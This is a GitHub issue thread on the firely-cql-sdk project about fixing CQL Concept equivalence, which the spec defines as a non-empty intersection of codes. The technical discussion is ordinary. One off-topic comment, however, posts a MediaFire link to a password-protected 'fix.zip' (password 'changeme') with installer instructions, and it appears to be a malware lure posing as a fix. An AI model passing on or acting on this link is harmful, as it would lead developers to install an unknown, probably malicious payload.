### ISSUE TITLE
Concept equivalence fix + unit test

### ISSUE THREAD

**Issue by baseTwo** [FirelyTeam/firely-cql-sdk#480]
According to the CQL spec: https://cql.hl7.org/02-authorsguide.html#comparison-operators

Quote: For Concept values, equivalence means the values have at least one equivalent code.

I created a test measure that used the exact examples in this unit test and it failed. I also tested this with java and it works.

The part that is unclear is if code should be equivalent to concept when the code matches at least one code in the concept.

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by baseTwo** [comment]
The unit test is failing, because the equivalence checking logic on a `CqlConcept` is wrong. The current logic expects equivalence between consecutive items in two lists. (see screenshot)
![image](https://github.com/user-attachments/assets/a630e29b-b0b5-4ae0-8aeb-680e40978ab2)

From the CQL reference, here is the correct logic:
>   ["For Concept values, equivalence is defined as a non-empty intersection of the codes in each Concept.<br><br>Note that this operator will always return true or false, even if either or both of its arguments are null, or contain null components."](https://cql.hl7.org/09-b-cqlreference.html#equivalent:~:text=determining%20Code%20equivalence.-,For%20Concept%20values%2C%20equivalence%20is%20defined%20as%20a%20non%2Dempty%20intersection,both%20of%20its%20arguments%20are%20null%2C%20or%20contain%20null%20components.,-The%20following%20examples)
